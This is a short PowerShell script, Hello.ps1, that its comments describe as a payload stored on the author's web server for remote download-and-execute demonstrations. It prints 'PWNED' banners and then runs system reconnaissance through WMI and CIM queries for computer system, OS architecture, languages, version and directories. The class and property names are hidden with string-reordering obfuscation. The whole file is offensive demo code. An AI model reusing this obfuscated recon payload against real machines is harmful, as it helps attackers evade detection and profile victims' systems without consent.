Hello.ps1

1. #
2. # Filename: Hello.ps1
3. # This file serves for remote download/execution demonstration effects ..
4. # and its stored in my remote apache2 webroot to be downloaded/executed remotely.
5. #
6. Write-Host ""
7. Write-Host "Hello.ps1 script executed remotelly .." -ForeGroundColor green -BackGroundColor black
8. Write-Host "            --- PWNED ---             " -ForeGroundColor red -BackGroundColor white
9. Start-Sleep 2
10. Write-Host "Extracting juice Info from system ..  " -ForeGroundColor yellow -BackGroundColor black
11. #
12. # Command obbfuscated with reorder method
13. #
14. $cmdla=("{1}{0}{4}{3}{2}" -f'32_Com','Win','tem','Sys','puter'); $cmdlr=("{5}{3}{4}{2}{1}{0}{6}" -f'Syst','ng','ati','32_','Oper','Win','em'); $cmdlo=("{1}{0}{2}" -f'itec','OSArch','ture'); $cmdll=("{2}{1}{0}{3}" -f'ua','ang','MUIL','ges'); $cmdld=("{1}{0}" -f'sion','Ver'); $cmdf=("{1}{2}{0}" -f'on','Cap','ti'); $cmdlk=("{0}{2}{3}{1}" -f'System','ory','Dir','ect'); $cmdlh=("{3}{2}{1}{0}" -f'tory','Direc','ows','Wind'); Get-WmiObject -Class $cmdla; Get-CimInstance $cmdlr | Select-Object $cmdlo, $cmdll, $cmdld, $cmdlh, $cmdlk, $cmdf | FL *; Start-Sleep 3; exit